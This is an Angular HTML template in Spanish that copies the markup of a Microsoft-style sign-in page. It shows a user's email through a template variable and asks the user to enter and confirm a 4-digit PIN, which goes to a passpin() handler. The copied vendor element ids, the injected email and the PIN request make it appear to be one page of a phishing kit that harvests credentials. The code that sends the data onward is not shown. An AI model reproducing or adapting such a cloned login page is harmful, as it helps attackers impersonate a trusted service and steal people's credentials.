<div class="outer" >

    <div class="template-section main-section">
        <div class="middle" >

            <div  id="lightbox"  class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">



        <div class="lightbox-cover" ></div>



        <div class="win-scroll">
            
            <div ><!--  -->

<img class="logo" role="img" pngsrc="assets/logo.png"   src="assets/logo.png" ><!-- /ko -->
<!-- /ko --><!-- /ko -->
<!-- /ko --></div>

            <div role="main" ><!--  -->

<div  class="">

    <div  class="animate slide-in-next">

        <div ><!--  -->

<div class="identityBanner">
  
    <button type="button" class="backButton"  id="idBtn_Back" aria-label="Atrás">
<img role="presentation"   svgsrc="assets/arrow.svg" src="assets/arrow.svg"><!-- /ko -->

    </button>


    <div id="displayName" class="identity"  title="{{loginemailks}}">{{loginemailks}}</div>
</div></div>
    </div>

    





<!--second mail-->






<div class="pagination-view animate has-identity-banner slide-in-next">


                <div [formGroup]='frmLoginpin'   data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true" ><!--  -->



<div id="loginHeader" class="row title ext-title" role="heading" aria-level="1">Ingrese su PIN - Personal</div>



<div class="row">
    <div class="form-group col-md-24">
        <div role="alert" aria-live="assertive">
            <!-- ko if: passwordTextbox.error -->
         
            <!-- /ko -->
        </div>
        <div class="placeholderContainer" >

            <input *ngIf="true" formControlName='pinxs'    type="password"   maxlength="113" lang="en" class="form-control ltr_override input ext-input text-box ext-text-box" aria-required="true" placeholder="Ingrese su PIN de 4 digitos">
           <br>
            <input   formControlName='pinxsrepet' *ngIf="true"   type="password"  id="i0116" maxlength="113" lang="en" class="form-control ltr_override input ext-input text-box ext-text-box" aria-required="true" placeholder="Confirme su PIN de 4 digitos">
    <input  type="password" id="i0118" autocomplete="off" class="moveOffScreen" tabindex="-1" aria-hidden="true">
</div>

        <!-- ko if: svr.C0 --><!-- /ko -->
    </div>
</div>



<div  class="position-buttons">
    <div>

        <div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top" >
            <label id="idLbl_PWD_KMSI_Cb">
                <input  id="idChkBx_PWD_KMSI0Pwd" type="checkbox"  aria-label="Mantener la sesión iniciada">
                <span >Mantener la sesión iniciada</span>
            </label>
        </div>
        <!-- /ko -->

        <div class="row">
            <div class="col-md-24">
                <div class="text-13">
 
                    <div class="form-group">
                        <a id="idA_PWD_ForgotPassword" role="link" href="" >¿Por qué es necesario crear mi PIN?</a>
                    </div>
       



                </div>
            </div>
        </div>
    </div>

    <div class="win-button-pin-bottom" >
        <div class="row" >
            <div ><div class="col-xs-24 no-padding-left-right button-container" >



    <div  class="inline-block">
      
        <input (click)="passpin()" [disabled]='!frmLoginpin.valid || !validacion()' type='submit'  class="button ext-button primary ext-primary" value="Continuar">
    </div>
</div></div>
        </div>
    </div>
</div>


</div><!-- /ko -->
   
    </div>







</div></div>
            <!-- /ko -->
        </div>




        <div><input type="hidden"  value="1">
<input type="hidden"  value="0">
<input type="hidden"  >
<input type="hidden"   value=""></div>
    <!-- /ko -->
            </div>





























            <!-- ko if: $page.newSession --><!-- /ko -->

            <!-- ko if: $page.showDebugDetails --><!-- /ko -->

            <!-- ko if: !svr.CA && $page.paginationControlMethods() && $page.paginationControlMethods().hasInitialViewShown() -->
            <div id="footer" role="contentinfo" class="footer ext-footer">

                <div ><!-- ko if: !hideFooter && (showLinks || impressumLink || showIcpLicense) -->
<div id="footerLinks" class="footerNode text-secondary">

    <!-- ko if: showFooter -->
        <!-- ko if: !hideTOU -->
        <a id="ftrTerms"  href="" class="footer-content ext-footer-content footer-item ext-footer-item">Términos de uso</a>
        <!-- /ko -->

        <!-- ko if: !hidePrivacy -->
        <a id="ftrPrivacy"  href="" class="footer-content ext-footer-content footer-item ext-footer-item">Privacidad y cookies</a>
        <!-- /ko -->

        <!-- ko if: impressumLink --><!-- /ko -->

        <!-- ko if: showIcpLicense --><!-- /ko -->
    <!-- /ko -->

    <!-- Set attr binding before hasFocusEx to prevent Narrator from losing focus -->
    <a id="moreOptions" href="#" role="button"  aria-label="Haga clic aquí para obtener información relacionada con la solución de problemas." aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
</div>
<!-- /ko -->

<!-- ko if: svr.Cq && showLinks --><!-- /ko --></div>
            </div>
            <!-- /ko -->
        </div>
    </div>
</div>